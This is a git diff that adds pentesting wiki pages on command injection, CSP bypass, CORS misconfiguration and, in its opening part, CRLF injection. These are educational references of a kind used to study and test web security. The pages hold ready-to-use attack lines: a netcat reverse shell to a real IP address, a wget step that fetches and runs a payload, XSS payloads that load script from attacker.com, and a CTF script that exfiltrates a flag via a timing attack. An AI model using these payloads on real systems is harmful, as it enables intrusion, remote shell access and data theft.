+ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
+ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
+ls %0A id # %0A Execute both (RECOMMENDED)
+
+#Only unix supported
+`ls` # ``
+$(ls) # $()
+ls; id # ; Chain commands
+
+#Not execute but may be interesting
+> /var/www/html/out.txt #Try to redirect the output to a file
+< /etc/passwd #Try to send some input to the command
+```
+
+### Bypasses
+
+If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this [**WAF bypasses**](../linux-unix/useful-linux-commands/bypass-bash-restrictions.md).
+
+### **Examples:**
+
+```text
+vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
+vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
+vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
+```
+
+## References
+
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" %}
+
+{% embed url="https://portswigger.net/web-security/os-command-injection" %}
+
diff --git a/pentesting-web/content-security-policy-csp-bypass.md b/pentesting-web/content-security-policy-csp-bypass.md
new file mode 100644
index 00000000..ff997565
--- /dev/null
+++ b/pentesting-web/content-security-policy-csp-bypass.md
@@ -0,0 +1,350 @@
+# Content Security Policy \(CSP\) Bypass
+
+## What is CSP
+
+Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting \(XSS\)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more.Here is an example of allowing resource from the local domain \(self\) to be loaded and executed in-line and allow string code  executing functions like `eval`, `setTimeout` or `setInterval:`
+
+`Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval';`
+
+### Headers
+
+* `Content-Security-Policy`
+* `Content-Security-Policy-Report-Only`This one won't block anything, only send reports \(use in Pre environment\).
+
+## Defining resources
+
+```text
+default-src 'none';
+img-src 'self';
+script-src 'self' https://code.jquery.com;
+style-src 'self';
+report-uri /__cspreport__
+font-src 'self' https://addons.cdn.mozilla.net;
+frame-src 'self' https://ic.paypal.com https://paypal.com;
+media-src https://videos.cdn.mozilla.net;
+object-src 'none';
+```
+
+### Some definitions
+
+* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into  elements, but also things like inline script event handlers \(onclick\) and XSLT stylesheets which can trigger script execution. 
+* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. 
+* **Child-src**: This directive defines allowed resources for web workers and embedded frame contents. 
+* **connect-src**: This directive restricts URLs to load using interfaces like ,fetch,websocket,XMLHttpRequest 
+* **frame-src**: This directive restricts URLs to which frames can be called out. 
+* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and  tags. This directive can't be used in  tags and applies only to non-HTML resources. 
+* **img-src**: It defines allowed sources to load images on the web page. 
+* **Manifest-src**: This directive defines allowed sources of application manifest files. 
+* **media-src**: It defines allowed sources from where media objects like , and  can be loaded. 
+* **object-src**: It defines allowed sources for the , and  elements.
+* **base-uri**: It defines allowed URLs which can be loaded using  element. 
+* **form-action**: This directive lists valid endpoints for submission from  tags. 
+* **plugin-types**: It defineslimits the kinds of mime types a page may invoke. 
+* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. 
+* **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the  sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
+
+### **Definitions of values**
+
+* \*: This allows any URL except data: blob: filesystem: schemes
+* **self**: This source defines that loading of resources on the page is  allowed from the same domain.
+* **data**: This source allows loading resources via the data scheme \(eg Base64 encoded images\)
+* **none**: This directive allows nothing to be loaded from any source.
+* **unsafe-eval**: This allows the use of eval\(\) and similar methods for creating code from strings. This is not a safe practice to include this source in any directive. For the same reason it is named as unsafe.
+* **unsafe-hashes**: This allows to enable specific inline event handlers.
+* **unsafe-inline**: This allows the use of inline resources, such as inline  elements, javascript: URLs, inline event handlers, and inline  elements. Again this is not recommended for security reasons.
+* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce \(number used once\). The server must generate a unique nonce value each time it transmits a policy.
+
+### Common Values
+
+```text
+'self' --> Your own domain
+'none' --> Anything
+https://code.jquery.com --> A Domain
+'unsafe-inline' --> Allows <script> and <style> chunks tobe interpreted
+'unsafe-eval' --> Allows string code executing functions like eval, setTimeout, setInterval or CSSStyleSheet.insertRule()
+'nonce-2726c7f26c' --> Allows the content with that nonce inside the HTML: <script nonce="2726c7f26c">
+'sha256-cLuU6nVzrYJlo7rUa6TMmz3nylPFrPQrEUpOHllb5ic=' --> The chunk with that hash inside the HTML can be execut
+```
+
+```text
+sameSite: 'strict'
+default-src 'self' 'unsafe-inline';
+img-src *;
+```
+
+## Unsafe Scenarios
+
+### 'unsafe-inline'
+
+```text
+Content-Security-Policy: script-src https://google.com 'unsafe-inline' https://*; 
+child-src 'none'; 
+report-uri /Report-parsing-url;
+```
+
+Working payload: `"/><script>alert(1);</script>`
+
+### 'unsafe-eval'
+
+```text
+Content-Security-Policy: script-src https://google.com 'unsafe-eval' data: http://*; 
+child-src 'none'; 
+report-uri /Report-parsing-url;
+```
+
+Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
+
+### Wildcard
+
+```text
+Content-Security-Policy: script-src 'self' https://google.com https: data *; 
+child-src 'none'; 
+report-uri /Report-parsing-url;
+```
+
+Working payload: `"/>'><script src=https://attacker.com/evil.js></script>`
+
+### Lack of object-src and default-src
+
+```text
+Content-Security-Policy: script-src 'self' 
+report-uri /Report-parsing-url;
+```
+
+Working payloads:
+
+* `<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> </object>`
+* `">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'><param name="AllowScriptAccess" value="always"></object>`
+
+### File Upload + 'self'
+
+```text
+Content-Security-Policy: script-src 'self'; 
+object-src 'none' ; 
+report-uri /Report-parsing-url;
+```
+
+If you can upload a JS file you can bypass this CSP:
+
+Working payload: `"/>'><script src="/user_upload/mypic.png.js"></script>`
+
+However, it's highly probable that the server is **validating the uploaded file** and will only allow you to **upload determined type of files**.
+
+Moreover, even if you could upload a **JS code inside** a file using a extension accepted by the server \(like: _script.png_\) this won't be enough because some servers like apache server **selects MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know** the _**.wave**_ extension, therefore it doesn't serve it with a **MIME type like audio/\***.
+
+From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot \([some polyglot examples here](https://github.com/Polydet/polyglot-database)\).
+
+### Allowing third party endpoints
+
+#### Arbitrary JS files loaded from whitelisted endpoints
+
+```text
+Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; 
+object-src 'none' ; 
+report-uri /Report-parsing-url;
+```
+
+Working payloads abusing cdnjs.cloudflare.com:
+
+```markup
+<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
+ 
+<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
+ <div ng-app ng-csp>
+  {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
+ </div>
+ 
+"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
+
+"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
+<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
+```
+
+#### JSONP
+
+```text
+Content-Security-Policy: script-src 'self' https://www.google.com;
+```
+
+In such scenarios where script-src is set to self and a particular domain which is whitelisted, it can be bypassed using jsonp. [jsonp](https://github.com/zigoo0/JSONBee) endpoints allow insecure callback methods which allow an attacker to perform xss.
+
+Working payload: `"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>`
+
+The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
+
+### Folder path bypass
+
+If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.  
+This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
+
+Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
+
+### Through iframes
+
+```text
+Content-Security-Policy: 
+default-src 'self' data: *; connect-src 'self'; script-src  'self' ;
+report-uri /_csp; upgrade-insecure-requests
+```
+
+Working payloads:
+
+```markup
+<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
+
+* sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)
+<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
+```
+
+### AngularJS events
+
+Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element \(the `window` object\) to execute a global function, such as `alert()`. The following code demonstrates this:
+
+```markup
+<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
+?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
+```
+
+### AngularJS and whitelisted domain
+
+```text
+Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
+```
+
+If the application is using angular JS and scripts are loaded from a whitelisted domain. It is possible to bypass this CSP policy by calling callback functions and vulnerable class. For more details visit this awesome [git](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22) repo.
+
+Working payloads:
+
+```text
+"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
+ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
+```
+
+### Bypass CSP with dangling markup
+
+Read [how here](dangling-markup-html-scriptless-injection.md).
+
+### 'unsafe-inline'; img-src \*; via XSS
+
+```text
+default-src 'self' 'unsafe-inline'; img-src *;
+```
+
+`'unsafe-inline'` means that you can execute any script inside the code \(XSS can execute code\) and `img-src *` means that you can use in the webpage any image from any resource.
+
+You can bypass this CSP exfiltrating the data via images \(in this occasion the XSS abuses a CSRF where a page accessible by the bot contains a SQLi, and extract the flag via an image\):
+
+```javascript
+<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
+```
+
+From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
+
+You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code \(as a regular XSS\) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+
+###  img-src \*; via XSS \(iframe\) - Time attack
+
+Notice the lack of the directive `'unsafe-inline'`    
+This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information \(**CSRF**\). You cannot access the content of the page, but if somehow you can **control the time the page needs to load**  you can extract the information you need.
+
+This time a **flag** is going to be extracted, whenever a **char is correctly guessed** via SQLi the **response** takes **more time** due to the sleep function. Then, you will be able to extract the flag:
+
+```javascript
+<iframe name=f id=g></iframe> // The bot will load an URL with the payload
+<script>
+let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
+function gen(x) {
+	x = escape(x.replace(/_/g, '\\_'));
+	return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`; 
+}
+
+function gen2(x) {
+	x = escape(x);
+	return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
+}
+
+async function query(word, end=false) { 
+	let h = performance.now();
+	f.location = (end ? gen2(word) : gen(word));
+	await new Promise(r => {
+		g.onload = r; 
+	});
+	let diff = performance.now() - h;
+	return diff > 300;
+}
+
+let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
+let postfix = '}'
+
+async function run() {
+	let prefix = 'nn9ed{';
+	while (true) {
+		let i = 0;
+		for (i;i<alphabet.length;i++) {
+			let c = alphabet[i];
+			let t =  await query(prefix+c); // Check what chars returns TRUE or FALSE
+			console.log(prefix, c, t);
+			if (t) {
+				console.log('FOUND!')
+				prefix += c;
+				break;
+			}
+		}
+		if (i==alphabet.length) {
+			console.log('missing chars');
+			break;
+		}
+		let t = await query(prefix+'}', true);
+		if (t) {
+			prefix += '}';
+			break;
+		}
+	}
+	new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
+	console.log(prefix);
+}
+
+run();
+</script>
+```
+
+## Policy Injection
+
+**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)\*\*\*\*
+
+### Chrome
+
+If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
+
+```text
+script-src-elem *; script-src-attr *
+script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
+```
+
+Because this directive will **overwrite existing script-src directives**.  
+You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
+
+### Edge
+
+In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.  
+Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_&y=%3Cscript%3Ealert\(1\)%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert%281%29%3C/script%3E)
+
+## Checking CSP Policies Online
+
+* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com/)
+* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
+
+## Automatically creating CSP
+
+[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
+
+## References
+
+{% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %}
+
+{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
+
+{% embed url="https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d" %}
+
+
+
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
new file mode 100644
index 00000000..851c606a
--- /dev/null
+++ b/pentesting-web/cors-bypass.md
@@ -0,0 +1,249 @@
+# CORS - Misconfigurations & Bypass
+
+## What is CORS
+
+The CORS \(Cross-origin resource sharing\) standard is needed because it **allows servers to specify who can access its assets** and which **HTTP request methods are allowed** from external resources.
+
+In a **same-origin** policy, is needed that both the **server requesting** a resource and the server where the **resource** is located uses the same protocol \(http://\),domain name \(internal-web.com\) and the same **port** \(80\). Then, if the server forces the same-origin policy, only web pages from the same domain and port will be able to access the resources.
+
+The following table shows how the same-origin policy will be applied in `http://normal-website.com/example/example.html`
:
+
+| URL accessed | Access permitted? |
+| :--- | :--- |
+| `http://normal-website.com/example/` | Yes: same scheme, domain, and port |
+| `http://normal-website.com/example2/` | Yes: same scheme, domain, and port |
+| `https://normal-website.com/example/` | No: different scheme and port |
+| `http://en.normal-website.com/example/` | No: different domain |
+| `http://www.normal-website.com/example/` | No: different domain |
+| `http://normal-website.com:8080/example/` | No: different port\* |
+
+\*_Internet Explorer will allow this access because IE does not take account of the port number when applying the same-origin policy._
+
+### `Access-Control-Allow-Origin` Header
+
+The specification of `Access-Control-Allow-Origin` allows for **multiple origins**, or the value **`null`**, or the wildcard **`*`**. However, **no browser supports multiple origins** and there are **restrictions** on the use of the **wildcard** `*`.\(_The wildcard can only be used alone, this will fail `Access-Control-Allow-Origin: https://*.normal-website.com` and it cannot be used with_ _Access-Control-Allow-Credentials: true_\)
+
+This header is **returned by a server** when a website requests a cross-domain resource, with an `Origin` header added by the browser.
+
+### `Access-Control-Allow-Credentials` Header
+
+The **default** behaviour of cross-origin resource requests is for **requests** to be **passed without credentials** like cookies and the Authorization header. However, the cross-domain server can **permit reading** of the **response** when **credentials** are **passed** to it by setting the CORS **`Access-Control-Allow-Credentials`** header to **`true`**.
+
+If the value is set to `true`then the browser will send credentials \(cookies, authorization headers or TLS client certificates\).
+
+```javascript
+var xhr = new XMLHttpRequest();
+xhr.open('GET', 'http://example.com/', true); 
+xhr.withCredentials = true; 
+xhr.send(null);
+```
+
+```javascript
+fetch(url, {
+  credentials: 'include'  
+})
+```
+
+### Pre-flight request
+
+Under certain circumstances, when a cross-domain request includes a **non-standard HTTP method or headers**, the cross-origin request is preceded by a **request** using the **`OPTIONS`** **method**, and the CORS protocol necessitates an initial check on what **methods and headers are permitted prior to allowing the cross-origin request**. This is called the **pre-flight check**. The server **returns a list of allowed methods** in addition to the **trusted origin** and the browser checks to see if the requesting website's method is allowed.
+
+For **example**, this is a pre-flight request that is seeking to **use the `PUT` method** together with a **custom** request **header** called `Special-Request-Header`:
+
+```text
+OPTIONS /data HTTP/1.1
+Host: <some website>
+...
+Origin: https://normal-website.com
+Access-Control-Request-Method: PUT
+Access-Control-Request-Headers: Special-Request-Header
+```
+
+The server might return a response like the following:
+
+```text
+HTTP/1.1 204 No Content
+...
+Access-Control-Allow-Origin: https://normal-website.com
+Access-Control-Allow-Methods: PUT, POST, OPTIONS
+Access-Control-Allow-Headers: Special-Request-Header
+Access-Control-Allow-Credentials: true
+Access-Control-Max-Age: 240
+```
+
+* `Access-Control-Allow-Headers` Allowed headers
+* `Access-Control-Expose-Headers`
+* `Access-Control-Max-Age` Defines a maximum timeframe for caching the pre-flight response for reuse
+* `Access-Control-Request-Headers` The header the cross-origin request wants to send
+* `Access-Control-Request-Method` The method the cross-origin request wants to use
+* `Origin` Origin of the cross-origin request \(Set automatically by the browser\)
+
+![](../.gitbook/assets/preflight.svg)
+
+Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.  
+**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
+
+## Exploitable misconfigurations
+
+Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.
+
+One notable exception is when the **victim's network location functions as a kind of authentication.** You can use a victim’s browser as a proxy to bypass IP-based authentication and access intranet applications. In terms of impact this is similar to DNS rebinding, but much less fiddly to exploit.
+
+### Reflected `Origin` in `Access-Control-Allow-Origin`
+
+In the real world this cannot happen as **this 2 values of the headers are forbidden together**.  
+It is also true that a lot of developers want to **allow several URLs in the CORS**, but subdomain wildcards or lists of URLs aren't allowed. Then, several developers **generates** the **`Access-Control-Allow-Origin`**header **dynamically**, and in more than one occasion they just **copy the value of the Origin header**.
+
+In that case, the **same vulnerability might be exploited.**
+
+In oder cases, the developer could check that the **domain** \(_victimdomain.com_\) **appears** in the **Origin header**, then, an attacker can use a domain called **`attackervictimdomain.com`** to steal the confidential information.
+
+### The `null` Origin
+
+`null` is a special value for the **Origin** header. The specification mentions it being triggered by redirects, and local HTML files.  Some applications might whitelist the `null` origin to support local development of the application.  
+This is nice because **several application will allow this value** inside the CORS and any **website can easily obtain the null origin using a sandboxed iframe**:
+
+```markup
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>
+```
+
+### **Regexp bypasses**
+
+If you found the domain _victim.com_ to be **whitelisted** you should check if _victim.com.**attacker.com**_ is **whitelisted also**, or, in case you can **takeover some subdomain**, check if _**somesubdomain**.victim.com_ is whitelisted.
+
+### **Advance Regexp bypasses**
+
+Most of the regex used to identify the domain inside the string will focus on alphanumeric ASCII characters and `.-` . Then, something like `victimdomain.com{.attacker.com` inside the Origin header will be interpreted by the regexp as if the domain was `victimdomain.com` but the browser \(in this case Safari supports this character in the domain\) will access the domain`attacker.com` .
+
+ The `_` character \(in subdomains\) is not only supported in Safari, but also in Chrome and Firefox!
+
+**Then, using one of those subdomains you could bypass some "common" regexps to find the main domain of a URL.**
+
+**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)\*\*\*\*
+
+![](../.gitbook/assets/image%20%28244%29.png)
+
+### From XSS inside a subdomain
+
+One defensive mechanism developers use against CORS exploitation is to white-list domains that frequently requests access for information. However, this isn’t entirely secure, because if even **one** of the subdomains of the **whitelisted** domain is **vulnerable** to other exploits such as **XSS**, it can enable CORS exploitation.
+
+Let us consider an example, the following code shows the configuration that allows subdomains of _requester.com_ to access resources of _provider.com_.
+
+```javascript
+if ($_SERVER['HTTP_HOST'] == '*.requester.com')
+ {
+  //Access data
+  else{ // unauthorized access}
+} 
+```
+
+Assuming that a user has access to sub.requester.com but not requester.com, and assuming that `sub.requester.com` is vulnerable to XSS. The user can exploit `provider.com` by using cross-site scripting attack method.
+
+### **Server-side cache poisoning**
+
+If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a [stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored) vulnerability.
+
+If an application **reflects** the **Origin header** without even checking it for illegal characters like **\r**, we effectively have a **HTTP header injection vulnerability against IE/Edge users as Internet Explorer and Edge view \r \(0x0d\) as a valid HTTP header terminator**:`GET / HTTP/1.1  
+Origin: z[0x0d]Content-Type: text/html; charset=UTF-7`
+
+Internet Explorer sees the response as:
+
+`HTTP/1.1 200 OK  
+Access-Control-Allow-Origin: z  
+Content-Type: text/html; charset=UTF-7`
+
+This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can **manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people**. The payload I've used will change the page's character set to **UTF-7**, which is notoriously useful for creating XSS vulnerabilities.
+
+### **Client-Side cache poisoning**
+
+You may have occasionally encountered a page with [reflected XSS](https://portswigger.net/web-security/cross-site-scripting/reflected) in a custom HTTP header. Say a web page reflects the contents of a custom header without encoding:`GET / HTTP/1.1  
+Host: example.com  
+X-User-id: <svg/onload=alert(1)>  
+  
+HTTP/1.1 200 OK  
+Access-Control-Allow-Origin: *  
+Access-Control-Allow-Headers: X-User-id  
+Content-Type: text/html  
+...  
+Invalid user: <svg/onload=alert(1)>`
+
+With CORS, we can send any value in the Header. By itself, **that's useless** since the response containing our **injected JavaScript won't be rendered**. However, **if Vary: Origin hasn't been specified** the response **may be stored in the browser's cache and displayed directly when the browser navigates to the associated URL**. I've made a fiddle to [attempt this attack on a URL of your choice](https://jsfiddle.net/3gk8u8wu/3/). Since this attack uses client-side caching, it's actually quite reliable.
+
+```markup
+<script>
+function gotcha() { location=url }
+var req = new XMLHttpRequest();
+url = 'https://example.com/'; // beware of mixed content blocking when targeting HTTP sites
+req.onload = gotcha;
+req.open('get', url, true);
+req.setRequestHeader("X-Custom-Header", "<svg/onload=alert(1)>")
+req.send();
+</script>
+```
+
+## Bypass
+
+### XSSI \(Cross-Site Script Inclusion\) / JSONP
+
+XSSI designates a kind of vulnerability which exploits the fact that, when a resource is included using the `script` tag, the SOP doesn’t apply, because scripts have to be able to be included cross-domain. An attacker can thus read everything that was included using the `script` tag.
+
+This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host. BurpSuite plugin: [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp)
+
+\*\*\*\*[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md)\*\*\*\*
+
+Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy.
+
+![](../.gitbook/assets/image%20%28118%29.png)
+
+### Easy \(useless?\) bypass
+
+You can ask a web-application to make a request for you and send back the response. This will bypass the the **`Access-Control-Allow-Origin`** but notice that the **credentials to the final victim won't be sent** as you will be **contacting a different domain** \(the one that will make the request for you\).
+
+#### [CORS-escape](https://github.com/shalvah/cors-escape)
+
+CORS-escape provides a **proxy** that **passes** on our **request** along with its **headers**, and it also **spoof** the **Origin** header \(Origin = **requested domain**\). So the **CORS policy is bypassed**.  
+The source code is [on Github](https://github.com/shalvah/cors-escape), so you can **host your own**.
+
+```javascript
+xhr.open("GET", "https://cors-escape.herokuapp.com/https://maximum.blog/@shalvah/posts");
+```
+
+#### [simple-cors-escape](https://github.com/shalvah/simple-cors-escape)
+
+Proxying is kinda like “passing on" your request, exactly as you sent it. We could solve this in an alternative way that still involves someone else making the request for you, but this time, **instead of using passing on your request, the server makes its own request, but with whatever parameters you specified.**
+
+### DNS Rebinding
+
+![](../.gitbook/assets/image%20%28157%29.png)
+
+Basically you make the **victim access your page**, then you change the **DNS of your domain \(the IP\)** and make it **points** to your **victims web page**. You make your **victim execute** \(**JS**\) something when the **TLS is** **over** so a new DNS request will be made and then you will be able to gather the information \(as you will always mantains **the user in your domain**, he won't send **any cookie** to the victim server, so this options abuses the speciall privileges of the IP of the victim\).
+
+Also, I don't know why this attack plays with the TLS of the DNS instead of just having a subdomain always pointing to the victims IP. 
+
+## **Tools**
+
+**Fuzz possible misconfigurations in CORS policies**
+
+* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
+* [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer)
+* [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy)
+* [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)
+
+## References
+
+{% embed url="https://portswigger.net/web-security/cors" %}
+
+{% embed url="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers\#CORS" %}
+
+{% embed url="https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" %}
+
+{% embed url="https://www.codecademy.com/articles/what-is-cors" %}
+
+{% embed url="https://www.we45.com/blog/3-ways-to-exploit-misconfigured-cross-origin-resource-sharing-cors" %}
+
+{% embed url="https://medium.com/netscape/hacking-it-out-when-cors-wont-let-you-be-great-35f6206cc646" %}
+
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration" %}
+
+{% embed url="https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b" %}
+
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
new file mode 100644
index 00000000..9b68ba8f
--- /dev/null
+++ b/pentesting-web/crlf-0d-0a.md
@@ -0,0 +1,152 @@
+# CRLF \(%0D%0A\) Injection
+
+## What is CRLF?
+
+When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, i.e. the response body. The HTTP headers and the HTML response \(the website content\) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF.
+
+The web server uses the CRLF to understand when new HTTP header begins and another one ends. The CRLF can also tell a web application or user that a new line begins in a file or in a text block. The CRLF characters are a standard HTTP/1.1 message, so it is used by any type of web server, including Apache, Microsoft IIS and all others.
+
+[![CRLF Injection and HTTP Response Splitting Vulnerability](https://dpsvdv74uwwos.cloudfront.net/statics/img/ogimage/crlf-http-header.jpg)](https://www.netsparker.com/blog/web-security/crlf-http-header/#)
+
+### What is the CRLF Injection Vulnerability?
+
+In a CRLF injection vulnerability attack the attacker inserts both the carriage return and linefeed characters into user input to trick the server, the web application or the user into thinking that an object is terminated and another one has started. As such the CRLF sequences are not malicious characters, however they can be used for malicious intend, for HTTP response splitting etc.
+
+## CRLF injection in web applications
+
